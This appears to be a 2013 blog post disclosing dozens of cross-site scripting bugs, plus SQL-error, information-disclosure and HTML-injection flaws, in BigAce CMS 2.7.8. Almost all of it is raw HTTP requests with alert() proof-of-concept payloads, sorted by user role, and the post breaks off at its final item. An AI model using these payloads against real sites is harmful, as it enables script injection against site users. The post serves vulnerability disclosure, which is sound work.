Monday 12 August 2013

[EN] BigAce 2.7.8 Multiple bugs

Last week I saw that in latest version of BigAce CMS Yashar shahinzadeh found a vulnerability.

I decide to check it again, and I found few other things described below.

I. For normal registered ('anonymous') user:


1. Escaping from the source code via Host header:

---< request >---
GET /bigace/public/index.php?cmd=smarty&id=-1_len HTTP/1.1
Host: 1"%22%2f%3e%3cimg%2fsrc="x"%2fonerror="alert(2)">aaaaaaaaaaaaaa%3c%68%31%3e%61%73%64%3c%2f%68%31%3e
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=t02veplpq601tanqc9ugm5sas1
Connection: close
---< request >---

Response:
 <link rel="stylesheet" href="http://1"%22%2f%3e%3cimg%2fsrc="x"%2fonerror="alert(2)">aaaaaaaaa
 aaaaa%3c%68%3 1%3e%61%73%64%3c%2f%68%31%3e/bigace/public/cid1/spring_flavour/style.css" type="text


II. For editor user logged-in:

1. xss

---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D='>"><script>alert(2)</script>&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---


2. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D='%3e"%3e<script>alert(2)</script>&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---


3. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D='%3e"%3e%3c<script>...&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---

4. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---


5. xss

---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=

---< request >---

6. xss

---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---


7. xss

---< request >---

POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D="%20body%20onload%3d"alert(4321)"%3e&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---

8. xss

---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---

9. xss

---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---

10. xss

---< request >---

POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&data%5Bcountry%5D=
---< request >---


11. xss

---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e
---< request >---


12. xss

---< request >---
POST /bigace/public/index.php?cmd=admin&id=categoryCreate_tADMIN_len&data[parent]='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e HTTP/1.1
Host: 10.149.14.52
---< request >---

13. xss and dom-based xss
---< request >---
GET /bigace/public/index.php?cmd=application&id=-1_timages_len&browserMode=listing&jsFunc='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e HTTP/1.1
Host: 10.149.14.52
---< request >---

14. xss

---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
Content-Type: multipart/form-data; boundary=---------------------------60191211818685
Content-Length: 1500

-----------------------------60191211818685
Content-Disposition: form-data; name="mode"

upload
-----------------------------60191211818685
Content-Disposition: form-data; name="userfile[]"; filename="2ASK.txt"
Content-Type: text/plain

sialala;]
-----------------------------60191211818685
Content-Disposition: form-data; name="data[parentid]"

-1
-----------------------------60191211818685
Content-Disposition: form-data; name="data[name]"


-----------------------------60191211818685
Content-Disposition: form-data; name="data[unique_name]"


-----------------------------60191211818685
Content-Disposition: form-data; name="data[description]"


-----------------------------60191211818685
Content-Disposition: form-data; name="data[langid]"

"><script>alert(43)</script><
-----------------------------60191211818685
Content-Disposition: form-data; name="data[category][]"

-1
-----------------------------60191211818685--
---< request >---


15. xss + information disclosure

---< request >---
POST /bigace/public/index.php?cmd=admin&id=statistic_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode="%20body%20onload%3d"alert(4321)"%3e

---< request >---


Response:

<div id="darkBackground">
<form name="" action="http://10.149.14.52/bigace/public/index.php?cmd=admin&id=statistic_tADMIN_len" method="POST">
<a href="http://10.149.14.52/bigace/public/index.php?cmd=admin&id=statistic_tADMIN_len&mode=" body onload="alert(4321)">"><img src="http://10.149.14.52/bigace/public/system/style/standard/refresh.png" border="0" align="top" alt="RELOAD" /></a> <select name="mode" onChange="this.form.submit()">
<option value="index">Statistics Info</option>
<option value="last7">Last Seven Daily Averages</option>
<option value="os">OS Information</option>
<option value="browser">Browser Information</option>
<option value="bots">Search Engines</option>
<option value="visitors">Top Visitors</option>
<option value="references">Top References</option>
<option value="byYear">By Year</option>
<option value="byUrl">By URL</option>
</select>
&nbsp;&nbsp;<noscript><button type="submit">Show</button></noscript></form>
</div>
<h3 class="error">Requested Mode does not exist: " body onload="alert(4321)"><br>/var/www/bigace/system/admin/plugins/includes/statistics/.php</h3><div align="center" class="CopyrightFooter"><span class="copyright">Powered by <a href="http://www.bigace.de/" target="_blank">BIGACE 2.7.8</a>.&nbsp;All rights reserved. <br />&copy; 2002-2013 <a href="http://www.kevinpapst.de/" target="_blank">Kevin Papst</a><br /></span></div>
<!-- $Id: AdminContentFooter.tpl.html,v 1.2 2009/02/28 00:43:33 kpapst Exp $ -->


16. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)

-----------------------------7318133896418
Content-Disposition: form-data; name="mode"

upload
-----------------------------7318133896418
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream


-----------------------------7318133896418
Content-Disposition: form-data; name="data[parentid]"

"><script>alert(/x/)</script>
-----------------------------7318133896418
Content-Disposition: form-data; name="data[name]"

aaaaaaaaaaaaaaaa
-----------------------------7318133896418
Content-Disposition: form-data; name="data[unique_name]"

aaaaaaaaaaaaaaaa
-----------------------------7318133896418
Content-Disposition: form-data; name="data[description]"

aaaaaaaaaaaaaaaa
-----------------------------7318133896418
Content-Disposition: form-data; name="data[langid]"

en
-----------------------------7318133896418
Content-Disposition: form-data; name="data[category][]"

-1
-----------------------------7318133896418--
---< request >---


17. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
-----------------------------7318133896418
Content-Disposition: form-data; name="mode"

upload
-----------------------------7318133896418
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream


-----------------------------7318133896418
Content-Disposition: form-data; name="data[parentid]"

-1
-----------------------------7318133896418
Content-Disposition: form-data; name="data[name]"

'"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e
-----------------------------7318133896418
Content-Disposition: form-data; name="data[unique_name]"

aaaaaaaaaaaaaaaa
-----------------------------7318133896418
Content-Disposition: form-data; name="data[description]"

aaaaaaaaaaaaaaaa
-----------------------------7318133896418
Content-Disposition: form-data; name="data[langid]"

en
-----------------------------7318133896418
Content-Disposition: form-data; name="data[category][]"

-1
-----------------------------7318133896418--
---< request >---

18. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52

-----------------------------7318133896418
Content-Disposition: form-data; name="mode"

upload
-----------------------------7318133896418
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream


-----------------------------7318133896418
Content-Disposition: form-data; name="data[parentid]"

-1
-----------------------------7318133896418
Content-Disposition: form-data; name="data[name]"

aaaaaaaaaaaaaaaa
-----------------------------7318133896418
Content-Disposition: form-data; name="data[unique_name]"

'"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e
-----------------------------7318133896418
Content-Disposition: form-data; name="data[description]"

aaaaaaaaaaaaaaaa
-----------------------------7318133896418
Content-Disposition: form-data; name="data[langid]"

en
-----------------------------7318133896418
Content-Disposition: form-data; name="data[category][]"

-1
-----------------------------7318133896418--
---< request >---

19. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=fileAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=6&data%5Bid%5D=1&data%5Blangid%5D=en&data%5Bworkflow%5D=&data%5Bname%5D=2ASK.txt&data%5Bunique_name%5D=2ASK.txt&data%5Bmimetype%5D=cze%3b]%3c%2fscript%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&data%5Bcatchwords%5D=asdasd&data%5Bdescription%5D=asdasd
---< request >---

20. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=menuAttributes_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=6&data%5Bid%5D=-1&data%5Blangid%5D=en&data%5Bparentid%5D=-9999&data%5Bunique_name%5D=index_en.html&data%5Bname%5D=Home&data%5Bcatchwords%5D=BIGACE+WEB+CMS&data%5Bdescription%5D=Menu+TOP-LEVEL&data%5Btext_4%5D="%20body%20onload%3d"alert(4321)"%3e&data%5Btext_3%5D=displayContent&data%5Bworkflow%5D=&data%5Bnum_3%5D=0
---< request >---

III. For 'designer' user logged-in:

1. xss
---< request >---
GET /bigace/public/index.php?cmd=admin&id=itemMenu_tADMIN_len&data[id]=-1&adminCharset='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data[langid]=en&mode=changeattrib HTTP/1.1
Host: 10.149.14.52
Connection: close
---< request >---


2. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=itemMenuCreate_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=createNewMenu&data%5BnextAdmin%5D=menuAttributes&data%5Blangid%5D=en&data%5Bparentid%5D=-1&data%5Bname%5D=asd&data%5Bcatchwords%5D=asd&data%5Bdescription%5D=asd&data%5Btext_4%5D='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&data%5Btext_3%5D=displayContent&data%5Bworkflow%5D=PublishingWorkflow&data%5Bnum_3%5D=0&data%5Bcontent%5D=
---< request >---

3. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=design_tADMIN_len&mode=update&hashtoken=0cbbd0bec2522717655d2458877c750b HTTP/1.1
Host: 10.149.14.52
Content-Length: 214

designName=BIGACE-REDIRECT&description=Redirects+to+the+URL+in+the+Menus+Catchwords.&template=REDIRECT&stylesheet=dummy_stylesheet&portletColumns='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&contents=asd
---< request >---


IV. For admin logged-in:

1. xss
---< request >---
GET /bigace/public/index.php?cmd=admin&id=itemMenuCreate_tADMIN_len&data[id]=-1&data[nextAdmin]='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e HTTP/1.1
Host: 10.149.14.52
---< request >---

Response:

<form name="MenuValues" onSubmit="return checkCreateForm();" action="http://10.149.14.52/bigace/public/index.php?cmd=admin&id=itemMenuCreate_tADMIN_len" method="POST">
<input type="hidden" name="mode" value="createNewMenu">
<input type="hidden" name="data[nextAdmin]" value="'>"><img/src="x"/onerror="alert(4321)">">


2. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
Content-Type: multipart/form-data; boundary=---------------------------309932421512500
Content-Length: 1022

-----------------------------309932421512500
Content-Disposition: form-data; name="mode"

upload
-----------------------------309932421512500
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream


-----------------------------309932421512500
Content-Disposition: form-data; name="data[parentid]"

a"><script>alert(1)</script>
-----------------------------309932421512500
Content-Disposition: form-data; name="data[name]"

aaaaaaaaaaaaa
-----------------------------309932421512500
Content-Disposition: form-data; name="data[unique_name]"

aaaaaaaaaaaaaaaaaaa
-----------------------------309932421512500
Content-Disposition: form-data; name="data[description]"

aaaaaaaaaaaaaaaaaaaaaaa
-----------------------------309932421512500
Content-Disposition: form-data; name="data[langid]"

en
-----------------------------309932421512500
Content-Disposition: form-data; name="data[category][]"

-1
-----------------------------309932421512500--
---< request >---


3. same request, parameter  data[name] (xss too)

4. same for parameter: data[unique_name], data[description].

for data[description] to reproduce you must exit from <textarea> tag, so
payload should be similar to this one:
</textarea><script>alert(2)</script>

5. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=itemMenuCreate_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=createNewMenu&data%5BnextAdmin%5D=itemMenu&data%5Blangid%5D=en&data%5Bparentid%5D=-1&data%5Bname%5D=aaaaaaaaaaaa&data%5Bcatchwords%5D=aaaaaaaaaaaaaaaaaaaaaa&data%5Bdescription%5D=aaaaaaaaaaaaa&data%5Btext_4%5D='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&data%5Btext_3%5D=displayContent&data%5Bworkflow%5D=&data%5Bnum_3%5D=0&data%5Bcontent%5D=
---< request >---

6. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
Content-Type: multipart/form-data; boundary=---------------------------47528326907
Content-Length: 1420

-----------------------------47528326907
Content-Disposition: form-data; name="mode"

upload
-----------------------------47528326907
Content-Disposition: form-data; name="userfile[]"; filename="2ASK.txt"
Content-Type: text/plain

sialala;]
-----------------------------47528326907
Content-Disposition: form-data; name="data[parentid]"

-1
-----------------------------47528326907
Content-Disposition: form-data; name="data[name]"


-----------------------------47528326907
Content-Disposition: form-data; name="data[unique_name]"


-----------------------------47528326907
Content-Disposition: form-data; name="data[description]"


-----------------------------47528326907
Content-Disposition: form-data; name="data[langid]"

"><script>alert(3)</script>
-----------------------------47528326907
Content-Disposition: form-data; name="data[category][]"

-1
-----------------------------47528326907--
---< request >---

7. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=fileAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=6&data%5Bid%5D=1&data%5Blangid%5D=en&data%5Bworkflow%5D=&data%5Bname%5D=2ASK.txt&data%5Bunique_name%5D=2ASK.txt&data%5Bmimetype%5D="><script>alert(9)</script>&data%5Bcatchwords%5D=aaaaaaaaaaaaaa&data%5Bdescription%5D=aaaaaaaaaaaaaaaaaaaaaaa
---< request >---

8. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len&mode=addToGroup HTTP/1.1
Host: 10.149.14.52

data%5Bid%5D=3&data%5Bgroup%5D=%27%3e%22%3e%3c%69%6d%67%2f%73%72%63%3d%22%78%22%2f%6f%6e%65%72%72%6f%72%3d%22%61%6c%65%72%74%28%34%33%32%31%29%22%3e
---< request >---


   
9. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D='"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---


10. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D='"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---


11. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D='"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---


12. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D='"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---

13. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 1048

-----------------------------12326531612573
Content-Disposition: form-data; name="mode"

importFiles
-----------------------------12326531612573
Content-Disposition: form-data; name="importURLs"

asdasdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[parentid]"

"><script>alert(234)</script>
-----------------------------12326531612573
Content-Disposition: form-data; name="data[name]"

asdasdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="namingType"

namingFile
-----------------------------12326531612573
Content-Disposition: form-data; name="data[unique_name]"

asd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[description]"

asdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[langid]"

en
-----------------------------12326531612573
Content-Disposition: form-data; name="data[category][]"

-1
-----------------------------12326531612573--
---< request >---


14. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---

15. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---

16. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&data%5Bcountry%5D=
---< request >---

17. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e
---< request >---


18. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
Content-Type: multipart/form-data; boundary=---------------------------12326531612573
Content-Length: 1039

-----------------------------12326531612573
Content-Disposition: form-data; name="mode"

importFiles
-----------------------------12326531612573
Content-Disposition: form-data; name="importURLs"

asdasdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[parentid]"

-1
-----------------------------12326531612573
Content-Disposition: form-data; name="data[name]"

"><script>alert(2)</script>
-----------------------------12326531612573
Content-Disposition: form-data; name="namingType"

namingFile
-----------------------------12326531612573
Content-Disposition: form-data; name="data[unique_name]"

asd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[description]"

asdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[langid]"

en
-----------------------------12326531612573
Content-Disposition: form-data; name="data[category][]"

-1
-----------------------------12326531612573--
---< request >---

19. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 1045

-----------------------------12326531612573
Content-Disposition: form-data; name="mode"

importFiles
-----------------------------12326531612573
Content-Disposition: form-data; name="importURLs"

asdasdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[parentid]"

-1
-----------------------------12326531612573
Content-Disposition: form-data; name="data[name]"

asdasdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="namingType"

namingFile
-----------------------------12326531612573
Content-Disposition: form-data; name="data[unique_name]"

"><script>alert(3)</script>
-----------------------------12326531612573
Content-Disposition: form-data; name="data[description]"

asdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[langid]"

en
-----------------------------12326531612573
Content-Disposition: form-data; name="data[category][]"

-1
-----------------------------12326531612573--
---< request >---

20. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 1053

-----------------------------12326531612573
Content-Disposition: form-data; name="mode"

importFiles
-----------------------------12326531612573
Content-Disposition: form-data; name="importURLs"

asdasdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[parentid]"

-1
-----------------------------12326531612573
Content-Disposition: form-data; name="data[name]"

asdasdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="namingType"

namingFile
-----------------------------12326531612573
Content-Disposition: form-data; name="data[unique_name]"

asd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[description]"

"></textarea><script>alert(2)</script>
-----------------------------12326531612573
Content-Disposition: form-data; name="data[langid]"

en
-----------------------------12326531612573
Content-Disposition: form-data; name="data[category][]"

-1
-----------------------------12326531612573--
---< request >---

21. SQL Injection

<td valign="top">MySQL error (1064:
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near 'x"/onerror="alert(4321)">'' at
line 1) for [SELECT count(id) as amount FROM cms_item_future WHERE itemtype='1' AND
id='-1' AND cid='1' AND language=''>"><img/src="x"/onerror="alert(4321)">'
       
        ;]
       
22. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=logging_tADMIN_len HTTP/1.1
Host: 10.149.14.52

start='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&amount=10&namespace=&level=
---< request >---

23. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=logging_tADMIN_len HTTP/1.1
Host: 10.149.14.52

start=1560&amount="%20body%20onload%3d"alert(4321)"%3e&namespace=&level=
---< request >---

24. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=community_tADMIN_len HTTP/1.1
Host: 10.149.14.52

s4lv09G4d=j6dbng376&o8F5hJ39y='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&kjhgzt87D=asd
---< request >---

25. xss + info disclo
---< request >---
POST /bigace/public/index.php?cmd=admin&id=statistic_tADMIN_len HTTP/1.1
Host: 10.149.14.52
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:22.0) Gecko/20100101 Firefox/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://10.149.14.52/bigace/public/index.php?cmd=admin&id=statistic_tADMIN_len
Cookie: PHPSESSID=d0mbv9u7103sdm3350bi0gepv0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45

mode='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX
---< request >---


26. adding new community

when you're adding new community you can write
directly to file consumer.ini. This can crash your site.
root@bt:/var/www/bigace# grep -n -r -e aaaaaaaa ./
./system/config/consumer.ini:9:[aaaaaaaaaaa]


In this case, I changed 'aaaa' string to html code to check if page
will show it (as html, not as txt). HTML injection is possible here.

27. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=communityInstall_tADMIN_len&s4lkhkj5svr=gI8n3Els143 HTTP/1.1
Host: 10.149.14.52

data%5Bnewdomain%5D="%20body%20onload%3d"alert(4321)"%3e&data%5Bsitename%5D=asd&data%5Bmailserver%5D=asd&data%5Bdefault_editor%5D=fckeditor&data%5Bdefault_style%5D=standard&data%5Bdefault_lang%5D=en&data%5Bstatistics%5D=TRUE&data%5Badmin%5D=&data%5Bwebmastermail%5D=%40&data%5Bpassword%5D=&data%5Bcheck%5D=
---< request >---

28. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=communityInstall_tADMIN_len&s4lkhkj5svr=gI8n3Els143 HTTP/1.1
Host: 10.149.14.52

